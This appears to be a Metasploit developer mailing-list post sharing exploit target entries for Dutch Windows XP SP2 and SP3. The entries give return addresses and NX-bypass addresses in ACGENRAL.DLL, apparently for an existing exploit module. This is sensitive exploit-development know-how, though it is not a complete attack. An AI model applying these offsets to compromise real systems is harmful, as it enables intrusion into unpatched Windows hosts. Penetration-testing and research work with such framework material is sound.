These work great for me:

[ 'Windows XP SP3 Dutch (NX)',
        {
                'Ret'       => 0x596cf807,
                'DisableNX' => 0x596d17c2,
                'Scratch'   => 0x00020408,
        }
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 5.1.2600.5512

[ 'Windows XP SP2 Dutch (NX)',
        {
                'Ret'       => 0x596cf727,
                'DisableNX' => 0x596d16e2,
                'Scratch'   => 0x00020408,
        }
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 5.1.2600.2180

-Niels
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to